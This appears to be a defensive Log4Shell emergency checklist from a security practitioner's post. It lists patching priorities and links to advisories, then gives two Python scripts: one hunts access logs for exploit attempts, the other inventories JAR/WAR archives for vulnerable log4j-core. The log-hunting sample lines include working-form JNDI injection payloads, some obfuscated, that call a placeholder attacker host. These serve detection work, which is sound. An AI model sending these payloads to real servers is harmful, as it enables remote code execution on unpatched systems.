Log4Shell Rapid Response 1-Page Emergency Checklist of What to do First
LOG4SHELL RAPID RESPONSE - IF THERE’S NO TIME and RESOURCES ARE SCARCE!
What to do if you’re unable to do anything else, if resources are scarce and the situation is critical:
1. Assign as large a team as can be spared and dedicate it to the effort. Focus immediately on INTERNET-FACING SERVERS first (DMZ, bare metal on prem and virtual, containers, cloud-based): tackle externally facing servers and devices before anything else, Apache servers foremost. See: https://logging.apache.org/log4j/2.x/download.html
- Then move to critical internal servers when able. Don’t try to tackle everything all at once. Focus on what’s most important first.
2. Keep Antivirus, EDR, IDS/IPS and NGFW (next-gen firewalls and WAFs) up to date, and check these and your SIEM / UEBA / other tools for indicators of compromise in the network related to Log4j / Log4Shell. Respond per the normal incident response process (eradicate/clean, lock down and patch the initially exploited assets) as soon as possible!
- HUNT for indicators of compromise and respond using the incident response process; see: https://securityblue.team/log4j-hunting-and-indicators/ (note: IOCs get old fast)
- See SECTIONS 4.1, 4.2 and 4.3 at TrustedSec playbook: https://www.trustedsec.com/blog/log4j-playbook/
- See our article 2B (coming soon – link will be provided when available)
3. Use existing vulnerability management and scan tools such as Rapid7, Qualys and Tenable to detect Log4j vulnerabilities and determine the most critical; patch those soonest (external first, then internal).
4. Check your vendors' customer portals for your products and for what to do or look for related to Log4Shell, and heed their guidance. Contact your security product and IT vendor representatives for any help.
5. Use the following website as a concise list of things to tackle and to assign critical tasks by IT function and by deadline: https://ciso.uw.edu/2021/12/10/apache-log4j-patch-now/
6. Use my playbooks 2A and 2B (coming soon) and, for now, the CISA or ASD sites for critical info on where to go deeper: https://www.cisa.gov/uscert/ncas/alerts/aa21-356a and https://www.cyber.gov.au/acsc/view-all-content/advisories/mitigating-log4shell-and-other-log4j-related-vulnerabilities and ...
7. Determine other critical systems and begin patching (internal once external is done); have a team start to look at all systems and the longer-term strategy. Use a scan tool such as Trend's or another to help (I make no guarantees in any links herein; use completely at your own risk!): https://github.com/NCSC-NL/log4shell (see all available items, including "scanning")
8. Mentor, coach, communicate and support others. Use teamwork, be resilient, and avoid burnout! Use my playbooks (2A and 2B, coming soon) to tackle this systematically with less friction!
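Step 2 above says to hunt for Log4Shell indicators; the script below is an added example of what that hunt looks like over web-server access logs, written for this checklist and not taken from the original post or any of the linked playbooks. It assumes Apache/nginx-style combined log lines, and the sample lines (and the host attacker.example) are constructed for the demonstration. The point it makes is that a plain substring search for "jndi" misses the obfuscated forms seen in the wild, so the script URL-decodes each line and collapses Log4j's own ${lower:...}/${upper:...} and ${...:-default} lookups before matching.

```python
"""
Hunt access logs for Log4Shell (CVE-2021-44228) exploitation attempts.

Added example for this checklist; not code from the original post. It expects
combined-format access log lines (client IP first) and reports every line that,
after de-obfuscation, carries a ${jndi:<scheme>://<host>...} lookup.
"""
import re
import sys
from urllib.parse import unquote

# Constructed sample lines, not real traffic. attacker.example is a placeholder host.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.11 - - [11/Dec/2021:03:14:09 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.12 - - [11/Dec/2021:03:14:12 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.13 - - [11/Dec/2021:03:14:15 +0000] "GET /login HTTP/1.1" 200 1024 "-" "%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D"
203.0.113.14 - - [11/Dec/2021:03:14:18 +0000] "POST /api HTTP/1.1" 200 20 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/d}"
198.51.100.7 - - [11/Dec/2021:03:14:20 +0000] "GET /docs/${version} HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

# ${lower:x} / ${upper:x} -> x  (case lookups used to split the "jndi" keyword)
LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}", re.IGNORECASE)
# ${anything:-x} -> x  (default-value form; ${::-j} yields the single letter j)
LOOKUP_DEFAULT = re.compile(r"\$\{[^}$]*?:-([^}$]*)\}")
# The indicator we actually want: a JNDI lookup with a URL scheme and host.
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def normalize(text):
    """Undo (multi-level) URL encoding, then collapse nested lookups inside-out."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        new = LOOKUP_CASE.sub(r"\1", text)
        new = LOOKUP_DEFAULT.sub(r"\1", new)
        if new == text:
            return text
        text = new


def hunt(lines):
    """Return one finding per log line that carries a JNDI lookup after normalization."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        m = JNDI.search(normalize(line))
        if m:
            hits.append({
                "src": line.split(" ", 1)[0],   # client IP, first field of the line
                "scheme": m.group(1).lower(),
                "host": m.group(2),
                "raw": line,
            })
    return hits


if __name__ == "__main__":
    # Usage: python hunt_log4shell.py access.log   (no argument: run on the sample)
    lines = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for h in hunt(lines):
        print(f"{h['src']}  {h['scheme']}://{h['host']}  <- {h['raw'][:80]}")
```

On the sample, the first and last lines are clean (a plain ${version} string is not a JNDI lookup) and the other four are reported with the callback scheme and host, which is what you hand to the IR team and block at the egress firewall. The normalizer is deliberately conservative: it only rewrites the lookup forms it understands, so anything it cannot collapse is still visible in the raw line.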
An excellent resource (slides) worth looking at to understand this one better:
https://github.com/NCSC-NL/log4shell/blob/main/detection_mitigation/Log4Shell%20for%20OES.pdf
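Steps 3 and 7 rely on scanners to find which hosts actually carry a vulnerable log4j-core. As an added example (not code from the original post, from Apache, or from any scanner vendor), the script below shows the host-based half of that job: walk a directory tree, open every JAR/WAR/EAR, read the bundled log4j-core version from its Maven pom.properties, note whether JndiLookup.class is present, and recurse one or two levels into archives nested inside archives. The 2.17.1 threshold is the fixed release for the last of the December 2021 log4j-core CVEs (CVE-2021-44832); the sample archives it builds are constructed in a temp directory and contain placeholder bytes, not real classes. It does not test live endpoints and will not see a copy of Log4j that was shaded under a renamed package.

```python
"""
Inventory JAR/WAR/EAR files for bundled log4j-core and flag what still needs a patch.

Added example for this checklist; not the original post's or any vendor's code.
Findings are keyed by archive path ("outer.war!WEB-INF/lib/inner.jar" for nested ones).
"""
import io
import os
import re
import sys
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# log4j-core 2.17.1 fixed CVE-2021-44832, the last of the December 2021 series.
# The 2.12.x (Java 7) and 2.3.x (Java 6) branches have their own fix versions.
FIXED = (2, 17, 1)


def parse_version(pom_properties_text):
    """Return (major, minor, patch) from a pom.properties 'version=' line, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", pom_properties_text, re.M)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def inspect_archive(zf, path, findings, depth=0):
    names = set(zf.namelist())
    version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace")) if POM_PROPS in names else None
    has_jndi = JNDI_LOOKUP in names
    if version or has_jndi:
        findings.append({
            "path": path,
            "version": version,
            "jndi_lookup": has_jndi,
            # 2.16+ still ships the class (JNDI is disabled by default), so the class
            # alone only matters when the version cannot be determined.
            "needs_patch": (version is None and has_jndi) or (version is not None and version < FIXED),
        })
    if depth >= 2:            # fat JARs inside WARs inside EARs; stop after two levels
        return
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, f"{path}!{name}", findings, depth + 1)
            except zipfile.BadZipFile:
                continue


def scan(root):
    """Walk root and return findings for every archive that bundles log4j-core."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        inspect_archive(zf, full, findings)
                except zipfile.BadZipFile:
                    continue
    return sorted(findings, key=lambda x: x["path"])


def make_jar(path, version, with_jndi=True, extra=None):
    """Write a constructed archive: placeholder bytes stand in for real class files."""
    with zipfile.ZipFile(path, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
        for name, data in (extra or {}).items():
            zf.writestr(name, data)


def build_sample_tree(root):
    """Constructed test tree (not real application files): two plain JARs, a non-log4j
    JAR, and a WAR that bundles a vulnerable log4j-core under WEB-INF/lib."""
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib, exist_ok=True)
    make_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
    make_jar(os.path.join(lib, "log4j-core-2.17.1.jar"), "2.17.1")   # class present, but fixed
    make_jar(os.path.join(lib, "commons-io.jar"), None, with_jndi=False)
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM_PROPS, "version=2.12.1\n")
        z.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    make_jar(os.path.join(root, "app", "webapp.war"), None, with_jndi=False,
             extra={"WEB-INF/lib/log4j-core-2.12.1.jar": inner.getvalue()})
    return root


def demo():
    """Build the constructed tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan(tmp)


if __name__ == "__main__":
    # Usage: python log4j_inventory.py /opt /srv   (no argument: run on the sample tree)
    results = [f for r in sys.argv[1:] for f in scan(r)] if len(sys.argv) > 1 else demo()
    for f in results:
        print(("PATCH  " if f["needs_patch"] else "ok     ") + f"{f['version']}  {f['path']}")
```

Run it with the directories where your JVM applications live and feed the PATCH lines into the prioritisation from steps 1 and 3 (external hosts first). The sample tree shows the two cases people get wrong: the 2.17.1 JAR still contains JndiLookup.class but is not flagged, and the 2.12.1 copy hidden inside the WAR is found only because the scan recurses into nested archives.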
#RCE #Log4Shell #Infosec #Cybersecurity. - CYBER Y'ALL! - @CyberYall